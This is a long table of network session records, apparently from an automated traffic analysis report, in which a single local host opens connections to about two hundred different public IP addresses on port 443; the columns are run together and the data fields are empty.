                                            22560192.168.2.2340382102.105.225.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22561192.168.2.233715240.53.205.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22562192.168.2.2360964114.218.150.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22563192.168.2.235424458.125.137.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22564192.168.2.234599635.109.233.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22565192.168.2.2338704106.173.133.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22566192.168.2.2336676206.85.254.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22567192.168.2.2348454180.52.217.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22568192.168.2.233535624.205.60.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22569192.168.2.2352010142.255.152.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22570192.168.2.2353060166.32.164.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22571192.168.2.235401882.245.165.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22572192.168.2.2355286112.5.188.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22573192.168.2.234293485.186.237.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22574192.168.2.2335120190.40.112.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22575192.168.2.2358402194.40.52.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22576192.168.2.2338510185.223.206.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22577192.168.2.2333552141.163.27.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22578192.168.2.2341556219.176.83.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22579192.168.2.234915891.1.227.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22580192.168.2.2342694157.97.110.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22581192.168.2.2342148209.199.78.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22582192.168.2.234086461.122.48.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22583192.168.2.233481438.131.145.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22584192.168.2.2338706193.200.100.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22585192.168.2.2337658173.157.149.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22586192.168.2.235919627.68.113.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22587192.168.2.235381424.207.15.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22588192.168.2.2354372170.114.115.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22589192.168.2.234797842.102.207.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22590192.168.2.235158260.78.54.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22591192.168.2.235511058.218.1.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22592192.168.2.2347584209.62.95.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22593192.168.2.235582681.108.220.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22594192.168.2.2346966114.83.218.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22595192.168.2.2358200106.1.152.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22596192.168.2.235212491.188.45.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22597192.168.2.2333194111.233.189.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22598192.168.2.2353888113.201.246.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22599192.168.2.2347888141.195.6.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22600192.168.2.234232268.233.94.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22601192.168.2.2345362210.101.237.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22602192.168.2.233468089.60.20.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22603192.168.2.233622863.121.2.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22604192.168.2.2360856162.57.57.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22605192.168.2.2340118201.50.39.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22606192.168.2.235648453.59.21.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22607192.168.2.235227095.160.77.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22608192.168.2.2349158121.38.213.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22609192.168.2.2344680115.32.60.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22610192.168.2.2346532115.139.22.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22611192.168.2.2339014116.48.113.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22612192.168.2.2356370151.212.29.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22613192.168.2.2360984132.97.33.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22614192.168.2.234638697.225.179.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22615192.168.2.235877251.227.167.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22616192.168.2.2334282164.61.227.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22617192.168.2.235757091.94.130.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22618192.168.2.2359616138.77.202.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22619192.168.2.234018238.161.222.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22620192.168.2.2343278110.158.27.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22621192.168.2.235341882.12.203.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22622192.168.2.235987251.232.61.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22623192.168.2.235316663.216.80.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22624192.168.2.234626470.243.63.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22625192.168.2.2338580159.65.188.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22626192.168.2.2347740190.145.189.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22627192.168.2.2352600135.89.132.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22628192.168.2.2340776207.10.203.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22629192.168.2.2334064155.240.198.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22630192.168.2.2339512130.109.152.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22631192.168.2.2332924212.96.43.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22632192.168.2.2354652176.123.109.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22633192.168.2.2338984218.193.111.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22634192.168.2.235129066.142.156.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22635192.168.2.233867882.232.138.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22636192.168.2.2352126220.152.4.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22637192.168.2.235632619.160.1.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22638192.168.2.235453496.98.10.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22639192.168.2.2360964219.14.236.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22640192.168.2.2332878160.185.68.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22641192.168.2.235879464.4.132.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22642192.168.2.234349467.155.166.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22643192.168.2.2347696223.169.212.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22644192.168.2.235120812.167.228.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22645192.168.2.2349068159.44.194.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22646192.168.2.233316037.45.11.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22647192.168.2.234614818.208.224.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22648192.168.2.2357010140.240.91.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22649192.168.2.2352032147.104.212.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22650192.168.2.2353098194.88.113.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22651192.168.2.234709627.24.81.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22652192.168.2.2351198144.20.208.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22653192.168.2.233857063.118.104.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22654192.168.2.2342270222.166.95.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22655192.168.2.234188062.138.148.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22656192.168.2.235028892.28.213.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22657192.168.2.2352148155.97.66.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22658192.168.2.2343252168.109.130.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22659192.168.2.23370445.15.240.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22660192.168.2.23599844.213.252.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22661192.168.2.235130048.4.21.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22662192.168.2.2345310218.75.81.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22663192.168.2.2348516198.158.16.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22664192.168.2.2347156182.109.164.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22665192.168.2.2334210138.153.190.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22666192.168.2.23492905.111.196.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22667192.168.2.2353258212.20.91.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22668192.168.2.2336304107.34.218.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22669192.168.2.234655032.3.170.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22670192.168.2.236032270.251.141.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22671192.168.2.233920813.169.197.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22672192.168.2.234867292.23.97.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22673192.168.2.2349356100.138.47.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22674192.168.2.235693853.202.201.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22675192.168.2.2346354181.180.212.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22676192.168.2.233835841.85.202.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22677192.168.2.2358986156.189.91.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22678192.168.2.2335702162.222.204.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22679192.168.2.2336576106.8.179.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22680192.168.2.2356708114.96.189.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22681192.168.2.234424649.254.135.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22682192.168.2.234365219.171.72.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22683192.168.2.23565381.134.50.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22684192.168.2.23541342.47.131.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22685192.168.2.2346930120.255.82.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22686192.168.2.235549088.225.33.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22687192.168.2.2352984165.189.125.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22688192.168.2.2338592218.230.182.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22689192.168.2.2333296115.203.93.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22690192.168.2.235382091.17.168.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22691192.168.2.2353840130.224.123.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22692192.168.2.2335602180.119.35.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22693192.168.2.234357842.29.163.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22694192.168.2.2347590116.16.213.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22695192.168.2.2344966218.241.35.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22696192.168.2.2336188154.137.126.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22697192.168.2.2355364212.229.112.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22698192.168.2.233308623.254.117.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22699192.168.2.236043495.172.124.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22700192.168.2.2336854125.101.183.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22701192.168.2.2342432137.47.159.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22702192.168.2.2339914151.76.61.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22703192.168.2.2343900124.110.176.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22704192.168.2.2360786147.179.150.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22705192.168.2.235323654.70.184.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22706192.168.2.2342636190.13.60.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22707192.168.2.2339126103.177.99.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22708192.168.2.2357162142.242.149.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22709192.168.2.235483046.160.12.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22710192.168.2.2355714217.0.160.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22711192.168.2.2346182129.159.71.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22712192.168.2.235003882.18.56.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22713192.168.2.233749084.231.78.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22714192.168.2.2347640133.122.138.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22715192.168.2.2345496115.205.140.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22716192.168.2.2348118136.120.231.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22717192.168.2.234939259.155.13.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22718192.168.2.23396688.75.109.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22719192.168.2.2357848209.242.145.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22720192.168.2.235364043.112.231.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22721192.168.2.2344670122.201.16.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22722192.168.2.2357740116.88.27.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22723192.168.2.233500490.197.6.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22724192.168.2.2341238185.224.119.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22725192.168.2.234489294.204.198.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22726192.168.2.234352682.250.74.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22727192.168.2.2346072150.255.201.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22728192.168.2.2341132189.148.120.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22729192.168.2.235449058.245.247.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22730192.168.2.234517032.36.22.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22731192.168.2.2359330221.21.172.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22732192.168.2.2341058186.111.189.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22733192.168.2.2347544128.66.46.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22734192.168.2.233462294.104.168.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22735192.168.2.235414673.37.225.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22736192.168.2.2339104216.233.170.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22737192.168.2.2347376176.15.34.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22738192.168.2.2355952121.213.253.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22739192.168.2.233670884.62.157.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22740192.168.2.235827219.31.30.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22741192.168.2.2346490167.98.68.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22742192.168.2.2350300146.106.90.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22743192.168.2.2335096213.177.118.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22744192.168.2.2350524150.56.192.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22745192.168.2.234409464.58.157.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22746192.168.2.2353044199.86.96.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22747192.168.2.2351846207.72.248.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22748192.168.2.2333308131.208.238.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22749192.168.2.2355254201.168.220.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22750192.168.2.2347660201.102.116.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22751192.168.2.2342198111.215.38.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22752192.168.2.2348752220.240.185.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22753192.168.2.235424473.4.49.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22754192.168.2.2340892124.146.0.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22755192.168.2.235047845.12.78.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22756192.168.2.235517045.33.226.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22757192.168.2.2345052182.91.17.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22758192.168.2.235504892.207.137.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22759192.168.2.2348242195.32.18.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22760192.168.2.235262286.243.145.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22761192.168.2.235493497.144.164.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22762192.168.2.2349486119.155.20.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22763192.168.2.234307613.28.102.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22764192.168.2.2357632110.229.110.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22765192.168.2.2334418196.9.96.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22766192.168.2.2344090200.105.242.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22767192.168.2.233503086.35.177.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22768192.168.2.2343308128.189.153.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22769192.168.2.233345863.173.115.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22770192.168.2.235992424.119.88.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22771192.168.2.2334188164.254.174.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22772192.168.2.2345754142.240.122.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22773192.168.2.2358078111.141.24.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22774192.168.2.2337566104.15.99.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22775192.168.2.235876651.246.197.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22776192.168.2.234638074.37.249.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22777192.168.2.234803250.120.51.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22778192.168.2.2354814196.95.236.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22779192.168.2.2357768217.101.182.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22780192.168.2.2339506152.95.132.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22781192.168.2.2358022217.61.149.228443
                                            TimestampBytes transferredDirectionData


